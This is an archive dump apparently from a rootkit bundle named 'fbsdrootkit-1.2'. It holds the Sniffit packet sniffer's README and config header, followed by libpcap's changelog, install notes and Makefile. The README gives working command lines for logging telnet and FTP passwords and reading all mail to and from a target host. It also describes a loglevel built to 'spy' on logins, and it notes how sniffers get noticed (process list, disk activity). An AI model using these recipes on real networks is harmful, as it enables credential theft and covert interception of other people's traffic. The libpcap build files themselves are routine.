You want to test if the sniffer is working: sniffit:~/# sniffit -d -p 7 -t 666.666.666.7 and in another window: sniffit:~/$ telnet target.com 7 you should see the sniffer giving you packets as you telnet to the 'echo' service. 2. I want to log some passwords from people on 666.666.666.7: sniffit:~/# sniffit -p 23 -t 666.666.666.7 3. Root of target.com tells me he gets strange ftp connections and wants to find out the commands typed: sniffit:~/# sniffit -p 21 -l 0 -t 666.666.666.7 4. You want to read all incomming and outgoing mail on target.com: sniffit:~/# sniffit -p 25 -l 0 -b -t 666.666.666.7 & or sniffit:~/# sniffit -p 25 -l 0 -b -s 666.666.666.7 & 5. You want to use the menu based interface. sniffit:~/# sniffit -i 6. Something is really wrong and you want to see the Control Messages with error codes. sniffit:~/# sniffit -P icmp -b -s 666.666.666.7 7. Go wild on scrolling the screen. sniffit:~/# sniffit -P ip -P icmp -P tcp -p 0 -b -a -d -x -s 666.666.666.7 witch is the same as sniffit:~/# sniffit -P ipicmptcp -p 0 -b -a -d -x -s 666.666.666.7 8. Log passwords in that way you can read them with 'more 666*' sniffit:~/# sniffit -p 23 -A . -t 666.666.666.7 or sniffit:~/# sniffit -p 23 -A ^ -t dummy.net 9. This could go on for ever.............. 3. Extra info on use -------------------- 3.1 Running interactive mode ---------------------------- When running in interactive mode: UP or 'k' : self explanatory DOWN or j': self explanatory F1 or '1' : Enter a host (enter 'all' for no mask) for packet filtering (host that sends the packets) F2 or '2' : Enter a host (enter 'all' for no mask) for packet filtering. (host that receives the packets) F3 or '3' : Enter a port (enter '0' for no mask) for packet filtering. (host that sends the packets) F4 or '4' : Enter a port (enter '0' for no mask) for packet filtering. (host that receives the packets) F5 or '5' : Start a program 'sniffit_key5' with arguments If the program doesn't exist, nothing is done. 
Sniffit should be in the same path as sniffit was STARTED FROM (not necessarely the path sniffit is stored in) This is usefull for interactive connection killing or extra monitoring. A little shell script can always transform the arguments given and pass them on to other programs. F6 or '6' : Same as F5 or '5', but with program 'sniffit_key6' F7 or '7' : Same as F5 or '5', but with program 'sniffit_key7' F8 or '8' : Same as F5 or '5', but with program 'sniffit_key8' ENTER : a window will pop up and log the connection, or the connection output will be send at a chosen device if you used the '-D' option. 'q' : When in logging mode, stop logging. Otherwise, quit. 'n' : Toggle netstatistics. These are sampled at 3 secs, look in the config.h file to change this (could be needed if y'r computer is slow). 'r' : Reset.. clears all current connections from memory and restarts. 3.2 Forcing network devices (*READ*) -------------------------------------- NOTE: the correct name (for sniffit) of a device can be found by running 'ifconfig' When forcing network devices, sniffit tries to find out what device it is. If sniffit recognises the name, everything is okay. If it does not recognise the name it will set the variable FORCED_HEAD_LENGHTH to the ethernet headlength. The ethernet headlength is the length in bytes of an ethernet packet hearder. So if you have to force a non-ethernet device, that is not recognised by sniffit, make sure you change that headlength correctly in the 'config.h' file. The -F option was added, because I noticed devicenames can differ from system to system, and because some ppl have multiple devices present. When having problems with this option, please think twice before you mail me. 3.3 Format of the config file ----------------------------- The configfile should have lines with the following format: [] (seperators are spaces (any number of), NO TABS!!!) 
Lines that don't match this pattern are discarded, so standard unix comments '#' can be used in this file... (this also means that if you have a typo there, Sniffit won't report it but just discard the line) (read this list, even if you don't get it at first, it will become clear in the examples) can be: select : Sniffit will look for packets that match the following description (other fields) deselect : Sniffit will ignore packets that match the description logfile : change the logfile name to instead of the default 'sniffit.log' can be: from : Packets FROM the host matching the following desc. are considered to : similar, Packets TO the.... both : similar, Packets FROM or TO the.... a filename : as an argument of 'logfile' in can be: host : The (de)selection criteria involves a hostname. port : similar, ... a portnumber mhosts : The (de)selection criteria involves multiple-hosts, like with the wildcars in 0.3.0, but without the 'x' can be: either a hostname, a portnumber or a numbet-dot partial notatiion indicating multiple hosts depending on can be: a portnumber, if was 'host' or 'mhosts' Maybe it would have been wise to mention explicitely, that the config-file currently only works with TCP packets. examples: 1. Look at this configuration file: select from host 100.100.12.2 select from host 100.100.12.3 1400 select to host coder.sniffit.com select both port 23 This file would cause Sniffit to give you the packets: a) Send by host 100.100.12.2 b) Send by host 100.100.12.3 from port 1400 c) Send to coder.sniffit.com d) All packets on our subnet going to or comming from a telnet port. 2. another example: select both mhosts 100.100.12. 
deselect both port 80 select both host enemy.sniffit.com This file would cause Sniffit to give you the packets: a) Send by hosts '100.100.12.*' b) EXCEPT the WWW packets c) BUT showing the WWW packets concerning enemy.sniffit.com The config file in interpreted SEQUENTIAL, so mixing up those lines could have unwanted results e.g.: select both mhosts 100.100.12. select both host enemy.sniffit.org deselect both port 80 This will give you the packets: a) Send by hosts '100.100.12.*' b) Send from/to enemy.sniffit.org c) deselecting all WWW packets on the subnet So if someone on enemy.sniffit.org is netscaping (assuming his 'target' has his httpd installed on port 80), you would see the packets with the first config file, BUT NOT with the second file, and that could spoil y'r fun when he's surfing to some kinky page. 3. Last usefull example: select both mhosts 1 select both mhosts 2 deselect both mhosts 1 80 deselect both mhosts 2 80 This would show you all subnet trafic excluding WWW trafic (concerning port 80.) NOTE: Everything is DESELECTED by default, so an empty config file will get you nothing. 3.4 Loglevels ------------- Levels are divided into groups (1-9, 10-29, ..??) and within each group, they 'add' features to the logging mode. e.g. loglevel 13, will do everything loglevel 12 does, and some additional stuff... (this for future development) Raw (levels 1-9) 1 : Log all SYN, FIN, RST packets. This will give you an overview of all network (TCP) trafic in a 'RAW' way (a connection starting could gives you at least 2 SYN packets, etc...). Messages are: Connection initiated. (SYN) Connection ending. (FIN) Connection reset. (RST) Normal (levels 10-29) 10: Same as Raw level 1, but a bit more intelligent. Unless packets are transmitted multiple times because of packet loss, you will only get 1 notice of a connection starting or ending. (the packet id will state the host that initiated the connection first) Messages are: Connection initiated. Connection closed. 
12: This option will spy on trafic concerning ports 21 and 23 on the subnet. Yes indeed, FTP and TELNET. Sniffit will try to catch login and passwords for these applications. FTP Easy catching. Even multiple tries are registered. TELNET A bit harder. We only try to catch the first attempt, so if someone fails the first login, you will miss his password. A '~' in the login and passwords fields can be a nonprintable character (if in the beginning of a field, probably due to an early start of registration) or a '~'. This all makes it sound a little messy, but I 'testdrived' a lot and was pleased with the results after adding some funky shit (if y'r interested have a look at in function 'packethandler' in sniffit.0.3.2.c) 4. The output ------------- 4.1 Normal ---------- - IP header info (not logged, displayed): Examples: from 100.100.60.80 to 100.100.69.63 IP Packet precedence: Routine (-T-) FLAGS: -- -- Time to live (secs): 59 Protocol (6): TCP from 100.100.69.31 to 100.100.69.63 IP Packet precedence: Routine (---) FLAGS: -- -- Time to live (secs): 60 Protocol (17): UDP from 100.100.69.51 to 100.100.69.63 IP Packet precedence: Routine (---) FLAGS: -- -- Time to live (secs): 255 Protocol (1): ICMP explanation: Precedence can be: Routine, Priority, Immediate, Flash, Flash override, Critical, Internetwork Control, Network control The Flags between brackets: (DTR) Delay-Throughput-reliability FLAGS: DF MF DF=Don't Fragment MF=More Fragments - TCP Packets (logged or displayed): The sniffer logs the data in ascii format. So when logging telnet connections, you will need to use 'joe' or something else that can support control chars (look for '-A ' below). Telnet 'negotiates' (binary) in the beginning of every connection, and 'catting' a output file, will most of the time show nothing (due to control chars). Of course when logging mail, there are no problems. 
The new '-A ' takes care of the control characters, that way you will be able to read the logfiles with 'more', 'vi', etc... -a and -d give you raw packets i.e. not unwrapped, on the screen (nothing is logged), -x gives you more info on the TCP package (everything is still logged unless using -a or -d mode), The flags are: U: Urgent pointer significant A: Acknowledgement is signif (will be shown) P: Push function R: Reset the connection S: Synchronizes sequence numbers F: No more data from sender (end connection) Filenames Created: Imagine a subnet with the hosts 666.666.666.666 and 666.666.666.7, and we run a sniffer on the first. The sniffer creates the following files: When logging packets TO host 666.666.666.7 (-t 666.666.666.7) files like 777.777.7.7.15000-666.666.666.7.23 are created, when the data CAME FROM host 777.777.7.7-15000 (with 15000 port used on 777.777.7.7 for that connection, and received on port 23 of 666.666.666.7) When logging packets FROM host 666.666.666.7 (-s 666.666.666.7) files like 666.666.666.7.15000-777.777.7.7-23 are created, when the data GOES TO host 777.777.7.7 (with 15000 port used on 666.666.666.7 for that connection) - ICMP Packets (not logged, displayed): On host 100.100.69.63 someone tried 'telnet 100.100.23.23' Suppose this host is unreachable, this could be a possible output: ICMP message id: 100.100.69.254 > 100.100.69.63 ICMP type: Destination unreachable Error: Host unreachable ICMP message concerned following IP packet: from 100.100.69.63 to 100.100.23.23 IP Packet precedence: Routine (---) FLAGS: -- -- Time to live (secs): 63 Protocol (6): TCP - UDP Packets (not logged, displayed) You get the package id. When using -d, -a you get the contence of the package. (pretty basic) 4.2 Logfile ----------- If you use a configfile (-c) and enable the Logging option a logfile is created. Unless you set 'logfile' in the config file, that file will be named 'sniffit.log'. 
It will contain lines with the following FIXED format:
1) Date - Connection id.: message
e.g. [Mon Aug 19 22:38:56 1996] - 100.100.10.10.1046-110.110.11.11.23: Connection initiated.
(conn. init. on the same line as the rest)
2) Except the starting line and the ending line of each session, they are:
[Mon Aug 19 22:38:51 1996] - Sniffit session started.
[Mon Aug 19 22:39:44 1996] - Sniffit session ended.
3) Lines containing other data (future versions), will NOT begin with '[' and will also have easily interpretable formats. Other data is e.g. packet contents
I do this because I can imagine (when this is more expanded) that people will use their own parsers for these logfiles. Well, if you respect those 3 rules, your parser will work on all future versions of Sniffit.
5. IMPORTANT NOTES, READ!
-------------------------
First of all, some stuff people who use this program should already know, if you don't, well here ya got it:
Some other notes:
- Sniffers can only be run by ROOT
- Sniffers can only log packets that 'travel' on THEIR ethernet cable. So there has to be some host on your subnet involved (either as sender or receiver).
- Working with '-d' or '-a' gives you raw packets, they are still packed in IP; when logging to files, only sent data is logged, the packets are 'unwrapped'.
- Sniffers can not be detected from the outside (look below for note on harddisk). Some people claim that tcp wrappers and stuff can detect sniffers, well that's bullshit. Sniffers are just 'sitting' on the line and reading what is passing anyway, they don't DO anything, they just watch.
They can be detected:
- In the processlist (ps -augwx)
- When the harddisk light flashes a lot, people can suspect something
Also harddisks can make a lot of noise, but these symptoms are only paid attention to in hostile environments.
- (LINUX) Your KERNEL should support System V IPC. If you will use '-i'
6.
BUGFIXES ----------- (PRIOR TO 0.2.0 - some are LINUX only) - Kernel 1.2.(some) incompatibility should be fixed. (like 1.2.5) (all credit for that to Godmar Back) - logging connections with lots of data is okay too now. 'the integer that needed to be a long'-bug. It was an overflow prob. - off course there are always minor ameliorations not worth mentioning (SINCE 0.2.0) - MAXCOUNT bug - interactive part lock-up bugs - output format (SINCE 0.3.0) - a wildcard bug - a Makefile bug (nothing important) (SINCE 0.3.1) - a typo caused the screwing up of the wildcard option (0.3.1) - 'select from host' didn't work... (SINCE 0.3.2) - a functions that had a parameter missing. - all interactive mode problems. 7. NEW STUFF ------------ V.0.1.0 - First test of the ncurses interface (never use this version, it's megaslow) V.0.1.1 - Added '-x' for extra information on TCP packets - Added '-A ' for you 'password-horny-dudes' ;) - beginning of ICMP support ('-P ') - First 'real' test for the interface V.0.1.2 - IP debugging info - UDP support - extended ICMP info (almost complete....) - logging on another terminal V.0.2.0 - SUN port (I now hate SPARC's ;) V.0.2.1 - SGI port V.0.2.2 - Netload statistics (interactive part) - Massive debugging of interactive part V.0.3.0 - Wildcards in non-interactive mode - time-out in non interactive mode, so you won't stuff memory by connections that weren't closed like they're supposed to be. - Forcing the use of a snif device - MTU changeble in config.h - ppp use V.0.3.1 - Flexible network trafic selection with config file. 
V.0.3.2 - IP checksum check - First introduction of a logfile for monitoring - Adding of loglevel: 1, 10, 12 V.0.3.3 - rewrite of some parts (big clean-up of interactive part) - Auto adjusting to screen of interface - Starting of external programs from interface ------------------------ Thx for using Sniffit(tm) --------------------------- fbsdrootkit-1.2/sniffit.0.3.3/config.h100600 764 764 6013 6226213207 14653 0ustar dfdf/* Sniffit Config File -- Brecht Claerhout */ /* if this variable is defined, the '-i' will be available, if not, it */ /* won't be available. */ /* If you don't need interactive sniffing (like logging when not there) */ /* compile it with this value #undef, this will make the program over 3 */ /* times smaller and it doesn't allocate all that memory. */ /* If you 'define' INCLUDE_INTERFACE, your kernel should support */ /* System V IPC (it probably does) */ #ifdef LINUX /* if you undef INCLUDE INTERFACE, don't forget to adjust the Makefile! */ /* information is in that file! */ #define INCLUDE_INTERFACE /*#undef INCLUDE_INTERFACE */ #endif #ifdef SUNOS /* if you undef INCLUDE INTERFACE, don't forget to adjust the Makefile! */ #define INCLUDE_INTERFACE /*#undef INCLUDE_INTERFACE */ #endif #ifdef FREEBSD /* if you undef INCLUDE INTERFACE, don't forget to adjust the Makefile! */ /* information is in that file! */ #define INCLUDE_INTERFACE /*#undef INCLUDE_INTERFACE */ #endif #ifdef IRIX #undef INCLUDE_INTERFACE #endif /* Not supported yet */ #ifdef BSDI #undef INCLUDE_INTERFACE #endif /* If you don't have the atexit() function, you will probably have on_exit */ /* so remove the atexit line and uncomment the on_exit line. */ #define exit_func(x) atexit(x) /* #define exit_func(x) on_exit (x,0) */ /* Following parameters describe the connections that can be handled at */ /* once, MAXCOUNT stands for connections handled in normal mode. 
As */ /* memory in normal mode is now handled dynamically, you can pump this */ /* number up without having to much trouble (Watch it, the machine */ /* could be slowed down a lot, and packets could get missed) */ /* CONNECTION_CAPACITY is the same, except in interactive mode, this is */ /* more dangerous to change, if you machine goes to slow (when sniffing */ /* in interactive mode), lower this number. */ #define MAXCOUNT 100 #ifdef INCLUDE_INTERFACE #define CONNECTION_CAPACITY 50 #endif /* This is the interval time for the netstatistics */ #define INFO_TIMER 3 /* In seconds */ /* Read about forcing the sniff device in the README.FIRST file */ #define FORCED_HEAD_LENGTH ETHERHEAD /* MTU: this could need a change on interfaces different from ethernet or on non-standard */ /* configured systems. Get the info out of 'ifconfig'. */ /* But 1500 is a standard. */ #define MTU 1500 /*************** Don't change anything below this line *********************/ #undef DEBUG /* Debugging (to tty) - sigh */ /* #define DEBUG */ #define DEBUG_DEVICE "/dev/tty9" #undef DEBUG_ONSCREEN /* Debugging (to screen) - sigh */ /*#define DEBUG_ONSCREEN */ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/ 40700 764 764 0 6257600151 14552 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/CHANGES100600 764 764 4245 6226213207 15647 0ustar dfdf@(#) $Header: CHANGES,v 1.4+ 94/06/20 19:22:33 leres Exp $ (LBL) v0.0.6 Fri Apr 28 04:07:13 PDT 1995 - Add missing variable declaration missing from 0.0.6 v0.0.5 Fri Apr 28 00:22:21 PDT 1995 - Workaround for problems when pcap_read() returns 0 due to the timeout expiring. v0.0.4 Thu Apr 20 20:41:48 PDT 1995 - Change configuration to not use gcc v2 flags with gcc v1. - Fixed a bug in pcap_next(); if pcap_dispatch() returns 0, pcap_next() should also return 0. Thanks to Richard Stevens (rstevens@noao.edu). - Fixed configure to test for snoop before dlpi to avoid problems under IRIX 5. Thanks to J. Eric Townsend (jet@abulafia.genmagic.com). 
- Hack around deficiency in Ultrix's make. - Fix two bugs related to the Solaris pre-5.3.2 bufmod bug; handle savefiles that have more than snapshot bytes of data in them (so we can read old savefiles) and avoid writing such files. v0.0.3 Tue Oct 18 18:13:46 PDT 1994 - Fixed configure to test for snoop before dlpi to avoid problems under IRIX 5. Thanks to J. Eric Townsend (jet@abulafia.genmagic.com). v0.0.2 Wed Oct 12 20:56:37 PDT 1994 - Implement timeout in the dlpi pcap_open_live(). Thanks to Richard Stevens. - Determine pcap link type from dlpi media type. Resulted from report by Mahesh Jethanandani (mahesh@npix.com). v0.0.1 Fri Jun 24 14:50:57 PDT 1994 - Fixed bug in nit_setflags() in pcap-snit.c. The streams ioctl timeout wasn't being initialized sometimes resulting in an "NIOCSFLAGS: Invalid argument" error under OSF/1. Reported by Matt Day (mday@artisoft.com) and Danny Mitzel (dmitzel@whitney.hitc.com). - Turn on FDDI support by default. v0.0 Mon Jun 20 19:20:16 PDT 1994 - Initial release. - Fixed bug with greater/less keywords, reported by Mark Andrews (mandrews@alias.com). - Fix bug where '|' was defined as BPF_AND instead of BPF_OR, reported by Elan Amir (elan@leeb.cs.berkeley.edu). - Machines with little-endian byte ordering are supported thanks to Jeff Mogul. - Add hack for version 2.3 savefiles which don't have caplen and len swapped thanks to Vern Paxson. - Added "&&" and "||" aliases for "and" and "or" thanks to Vern Paxson. - Added length, inbound and outbound keywords. fbsdrootkit-1.2/sniffit.0.3.3/libpcap/INSTALL100600 764 764 11704 6226213207 15723 0ustar dfdf@(#) $Header: INSTALL,v 1.5+ 94/06/20 18:56:52 leres Exp $ (LBL) To build libpcap, first customize any paths in Makefile.in, then run ./configure (a shell script). "configure" will determine your system attributes and generate an appropriate Makefile from Makefile.in. Next run "make", and if everything goes well, su and run "make install". 
(If your system is not listed in the README as one which we have tested, you may have to modify the configure script and Makefile.in; please send us patches for any modifications you need to make.)
You need not install libpcap if you just want to build tcpdump (but make sure tcpdump and libpcap have the same parent directory during the build).
You will need an ANSI C compiler to build libpcap. If your compiler is not ANSI compliant, use the GNU C compiler, available via anonymous ftp: ftp://prep.ai.mit.edu/pub/gnu/gcc-*.tar.gz
If you do use gcc, you must run the "fixincludes" script. The configure script automatically detects this possible configuration problem.
If you use flex, version 2.4.6 or higher is recommended. The current version of flex is available via anonymous ftp: ftp://ftp.ee.lbl.gov/flex-*.tar.Z
Earlier versions of 2.4 require declarations for some internal memory allocator routines. Version 2.3 and earlier caused typedef conflicts with sys/types.h. If you don't have a version of flex that works, plain old lex works ok. But if you use lex/yacc, libpcap will have symbols that will conflict with other yacc/lex generated code (yes, this can be fixed with a script that maps the yy* identifiers, but flex and bison do this automatically so we haven't bothered). Note that the stock version of flex under DEC OSF/1 is 2.3.
If you use Solaris, there is a bug with bufmod(7) that is supposed to be fixed in 5.3.2. Setting a snapshot length with the broken bufmod(7) results in data being truncated from the FRONT of the packet instead of the end. The workaround is to not set a snapshot length, but this results in performance problems since the entire packet is copied to user space. There is a patch available from Sun; ask for bugid 1149065. After installing the patch, use "setenv BUFMOD_FIXED" to enable use of bufmod(7).
If linking tcpdump fails with "Undefined: _alloca" when using bison on a Sun4, your version of bison is broken.
In any case version 1.16 or higher is recommended (1.14 is known to cause problems 1.16 is known to work). Either pick up a current version from: ftp://prep.ai.mit.edu/pub/gnu/bison-*.tar.gz or hack around it by inserting the lines: #ifdef __GNUC__ #define alloca __builtin_alloca #else #ifdef sparc #include #else char *alloca (); #endif #endif right after the (100 line!) GNU license comment in bison.simple, remove grammar.[co] and fire up make again. If you are running a version of SunOS earlier than 4.1, you will need to replace the Sun supplied /sys/sun{3,4,4c}/OBJ/nit_if.o with the appropriate version from this distribution's SUNOS4 subdirectory and build a new kernel: nit_if.o.sun3-sunos4 (any flavor of sun3) nit_if.o.sun4c-sunos4.0.3c (SS1, SS1+, IPC, SLC, etc.) nit_if.o.sun4-sunos4 (Sun4's not covered by nit_if.o.sun4c-sunos4.0.3c) These nit replacements fix a bug that makes nit essentially unusable in pre-SunOS 4.1. In addition, our sun4c-sunos4.0.3c nit gives you timestamps to the resolution of the SS-1 clock (1 us) rather than the lousy 20ms timestamps Sun gives you (tcpdump will print out the full timestamp resolution if it finds it's running on a SS-1). 
FILES ----- CHANGES - description of differences between releases INSTALL - this file Makefile.in - compilation rules (input to the configure script) README - description of distribution RUNSON - list of supported hardware and operating systems VERSION - version of this release bpf/net - copies of bpf_filter.c and bpf.h bpf_image.c - BPF disassembly routine checkioctl.c - gcc test program configure - configure script (run this first) etherent.c - /etc/ethers support routines ethertype.h - ethernet protocol types and names definitions gencode.c - BPF code generation routines gencode.h - BPF code generation definitions grammar.y - filter string grammar inet.c - network routines mkdep - construct Makefile dependency list nametoaddr.c - hostname to address routines net - symlink to bpf/net optimize.c - BPF optimization routines pcap-bpf.c - BSD Packet Filter support pcap-dlpi.c - Data Link Provider Interface support pcap-enet.c - enet support pcap-int.h - internal libpcap definitions pcap-namedb.h - public libpcap name database definitions pcap-nit.c - Network Interface Tap support pcap-nit.h - Network Interface Tap definitions pcap-pf.c - Packet Filter support pcap-pf.h - Packet Filter definitions pcap-snit.c - Streams based Network Interface Tap support pcap-snoop.c - Snoop network monitoring support pcap.3 - manual entry pcap.c - pcap utility routines pcap.h - public libpcap definitions savefile.c - offline support scanner.l - filter string scanner fbsdrootkit-1.2/sniffit.0.3.3/libpcap/Makefile100600 764 764 44350 6226213207 16335 0ustar dfdf# Copyright (c) 1993, 1994, 1995 # The Regents of the University of California. All rights reserved. 
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that: (1) source code distributions
# retain the above copyright notice and this paragraph in its entirety, (2)
# distributions including binary code include the above copyright notice and
# this paragraph in its entirety in the documentation or other materials
# provided with the distribution, and (3) all advertising materials mentioning
# features or use of this software display the following acknowledgement:
# ``This product includes software developed by the University of California,
# Lawrence Berkeley Laboratory and its contributors.'' Neither the name of
# the University nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
#
# @(#) $Header: Makefile.in,v 1.37+ 94/06/25 14:53:47 leres Exp $ (LBL)

# NOTE(review): the $Header above names Makefile.in and `realclean' below
# deletes Makefile, so this file looks like configure output with the linux
# lines enabled -- confirm before editing it by hand.

#
# Various configurable paths
#

# where the installed pcap files go
INCL_DIR = /usr/local/include
# where libpcap.a should go
LIB_DIR = /usr/local/lib
# where man page should go
MAN_DIR = /usr/local/man

#
# Owner of installed files
#
BIN_GRP = bin
BIN_OWN = bin

#
# You shouldn't need to edit anything below.
#

# Lines prefixed with #have-<feature># are inactive alternatives.  In this
# copy every one of them is still commented out; the only capture backend
# selected is the plain `PCAP = linux' assignment below.
#have-ethers#ETHERS_DEFINES = -DETHER_SERVICE
#have-sunos5#OS_DEFINES = -DSOLARIS
DEFINE_STDC = -D__STDC__
#have-gcc#DEFINE_STDC =
#have-irix4#OS_DEFINES = -Dvolatile= $(DEFINE_STDC)
#have-irix5#OS_DEFINES = -Dvolatile= $(DEFINE_STDC)
#have-pf#PCAP_DEFINES = -DPCAP_PF

#have-bpf#PCAP = bpf
#have-dlpi#PCAP = dlpi
#have-nit#PCAP = nit
#have-pf#PCAP = pf
#have-snit#PCAP = snit
#have-snoop#PCAP = snoop
# Selects pcap-linux.c through PCAPSRC = pcap-$(PCAP).c further down.
PCAP = linux

CCOPT = -O
# INCLUDES is assigned twice; the second assignment (which adds
# linux-include) is the one make uses.
INCLUDES = -I.
INCLUDES = -I. -Ilinux-include
# ETHERS_DEFINES, PCAP_DEFINES and OS_DEFINES are only set by the
# commented-out #have-*# lines above, so here they expand to nothing.
DEFINES = -DFDDI $(ETHERS_DEFINES) $(PCAP_DEFINES) $(OS_DEFINES)

# Standard CFLAGS
CFLAGS = $(CCOPT) $(DEFINES) $(INCLUDES)

# Standard C compiler
CC = cc
# GCC_FLAGS is only referenced by the inactive #have-gcc# CC line.
GCC_FLAGS = -Wmissing-prototypes -Wstrict-prototypes
#have-gcc1#GCC_FLAGS =
#have-gcc#CC = gcc -g -Wall $(GCC_FLAGS)

#
# Flex and bison allow you to specify the prefixes of the global symbols
# used by the generated parser.  This allows programs to use lex/yacc
# and link against libpcap.  If you don't have flex or bison, get them.
#
LEX = lex
YACC = yacc
#have-flex#LEX = flex -Ppcap_
#have-bison#YACC = bison -y -p pcap_

MAKE = make
SHELL = /bin/sh
# RANLIB is also assigned twice; the later value (ranlib) is the one used.
RANLIB = true
RANLIB = ranlib

# Explicitly define compilation rule since SunOS 4's make doesn't like gcc.
# Also, gcc does not remove the .o before forking 'as', which can be a
# problem if you don't own the file but can write to the directory.
.c.o:
	rm -f $@; $(CC) $(CFLAGS) -c $*.c

# Platform-specific capture source, chosen by PCAP above.
PCAPSRC = \
	pcap-$(PCAP).c
CSRC =	pcap.c inet.c gencode.c optimize.c nametoaddr.c etherent.c savefile.c \
	bpf_filter.c bpf_image.c
LSRC =	scanner.l
YSRC =	grammar.y
# C files produced from the lex and yacc inputs.
GENSRC = \
	$(LSRC:.l=.c) $(YSRC:.y=.c)

SRC =	$(PCAPSRC) $(CSRC) $(GENSRC)

# Every source shipped in the distribution tarball, not just the ones
# built for this platform.
ALLSRC = \
	pcap-bpf.c pcap-dlpi.c pcap-enet.c pcap-nit.c pcap-pf.c \
	pcap-snit.c pcap-snoop.c \
	$(CSRC) checkioctl.c $(LSRC) $(YSRC)

OBJ =	$(SRC:.c=.o)
# Some makes can't handle the above substitution
#have-broken-make#OBJ = pcap-$(PCAP).o \
#have-broken-make# pcap.o inet.o gencode.o optimize.o nametoaddr.o \
#have-broken-make# etherent.o savefile.o bpf_filter.o bpf_image.o \
#have-broken-make# scanner.o grammar.o
HDR =	pcap.h pcap-int.h pcap-namedb.h pcap-nit.h pcap-pf.h \
	ethertype.h gencode.h
GENHDR = \
	tokdefs.h

TAGFILES = \
	$(SRC) $(HDR)

TARFILES = \
	README CHANGES INSTALL VERSION Makefile.in pcap.3 mkdep \
	$(ALLSRC) $(HDR) \
	net bpf/net/bpf_filter.c bpf/net/bpf.h SUNOS4 configure

CLEANFILES = \
	$(OBJ) libpcap.a checkioctl lex.yy.c $(GENSRC) $(GENHDR)

# Rebuild the static library from scratch each time.
libpcap.a: $(OBJ)
	rm -f libpcap.a
	ar rc $@ $(OBJ)
	$(RANLIB) $@

checkioctl: checkioctl.c
	rm -f $@; $(CC) $(CFLAGS) $@.c -o $@

# $$$$ reaches the shell as $$ (its process id), so the scanner is first
# written to a <pid>.scanner.c file in the build directory and then renamed.
scanner.c: scanner.l
	rm -f $@; $(LEX) -t $< > $$$$.$@; mv $$$$.$@ $@

# LEX_DEFINES is not assigned anywhere in the part of the file shown here.
scanner.o: scanner.c tokdefs.h
	rm -f $@; $(CC) $(CFLAGS) $(LEX_DEFINES) -c $*.c

# tokdefs.h is a by-product of the grammar.c rule (y.tab.h renamed).
tokdefs.h: grammar.c
grammar.c: grammar.y
	rm -f grammar.c tokdefs.h
	$(YACC) -d $<
	mv y.tab.c grammar.c
	mv y.tab.h tokdefs.h

# grammar.c is compiled with yylval renamed to pcap_lval.
grammar.o: grammar.c
	$(CC) -c $(CFLAGS) -Dyylval=pcap_lval grammar.c

# Creates INCL_DIR and LIB_DIR when missing (mode 755), then copies the
# library and the two public headers as mode 444 owned by BIN_OWN:BIN_GRP.
# net/bpf.h is installed only when /usr/include/net/bpf.h does not exist.
# NOTE(review): the chown/chgrp steps imply this is run with elevated
# privileges; in that case confirm INCL_DIR and LIB_DIR are not writable by
# other users, since cp/chmod/chown act on whatever already exists there.
install: force
	@for i in $(INCL_DIR) $(LIB_DIR) ; do \
	    if [ ! -d $$i ] ; then \
		echo "mkdir $$i"; \
		mkdir $$i; \
		chmod 755 $$i; \
		chown $(BIN_OWN) $$i; \
		chgrp $(BIN_GRP) $$i; \
	    else \
		true; \
	    fi; \
	done
	cp libpcap.a $(LIB_DIR); \
	chmod 444 $(LIB_DIR)/libpcap.a; \
	chown $(BIN_OWN) $(LIB_DIR)/libpcap.a; \
	chgrp $(BIN_GRP) $(LIB_DIR)/libpcap.a
	-$(RANLIB) $(LIB_DIR)/libpcap.a
	cp pcap.h pcap-namedb.h $(INCL_DIR); \
	chmod 444 $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \
	chown $(BIN_OWN) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \
	chgrp $(BIN_GRP) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h
	@if [ ! -f /usr/include/net/bpf.h ]; then \
	    i=$(INCL_DIR)/net; \
	    if [ ! -d $$i ] ; then \
		echo "mkdir $$i"; \
		mkdir $$i; \
		chmod 755 $$i; \
		chown $(BIN_OWN) $$i; \
		chgrp $(BIN_GRP) $$i; \
	    else \
		true; \
	    fi; \
	    set -x; \
	    cp net/bpf.h $(INCL_DIR)/net; \
	    chmod 444 $(INCL_DIR)/net/bpf.h; \
	    chown $(BIN_OWN) $(INCL_DIR)/net/bpf.h; \
	    chgrp $(BIN_GRP) $(INCL_DIR)/net/bpf.h; \
	fi

# Same pattern for the manual page: create $(MAN_DIR)/man3 when missing,
# then install pcap.3 as mode 444 owned by BIN_OWN:BIN_GRP.
install-man: force
	@i=$(MAN_DIR)/man3; \
	    if [ ! -d $$i ] ; then \
		echo "mkdir $$i"; \
		mkdir $$i; \
		chmod 755 $$i; \
		chown $(BIN_OWN) $$i; \
		chgrp $(BIN_GRP) $$i; \
	    else \
		true; \
	    fi; \
	cp pcap.3 $(MAN_DIR)/man3
	chmod 444 $(MAN_DIR)/man3/pcap.3
	chown $(BIN_OWN) $(MAN_DIR)/man3/pcap.3
	chgrp $(BIN_GRP) $(MAN_DIR)/man3/pcap.3

clean:
	rm -f $(CLEANFILES)

# Also removes the Makefile itself and the tags file.
realclean:
	rm -f $(CLEANFILES) Makefile tags

tags:	$(TAGFILES)
	ctags -wtd $(TAGFILES)

# Maintainer target: temporarily symlinks ../libpcap-<VERSION> to this
# directory, archives $(TARFILES) under that name, compresses the result
# and removes the symlink again.
# NOTE(review): the archive is written to a fixed, predictable name under
# /tmp through a shell redirection, which writes through a pre-existing
# file or symlink of that name.  On a multi-user host prefer a private
# output directory.
tar:	force
	@cwd=`pwd` ; dir=`basename $$cwd` ; name=libpcap-`cat VERSION` ; \
	    list="" ; tar="tar cFFf" ; \
	    for i in $(TARFILES) ; do list="$$list $$name/$$i" ; done; \
	    echo \
	    "rm -f ../$$name; ln -s $$dir ../$$name" ; \
	     rm -f ../$$name; ln -s $$dir ../$$name ; \
	    echo \
	    "(cd .. ; $$tar - [lots of files]) | compress > /tmp/$$name.tar.Z" ; \
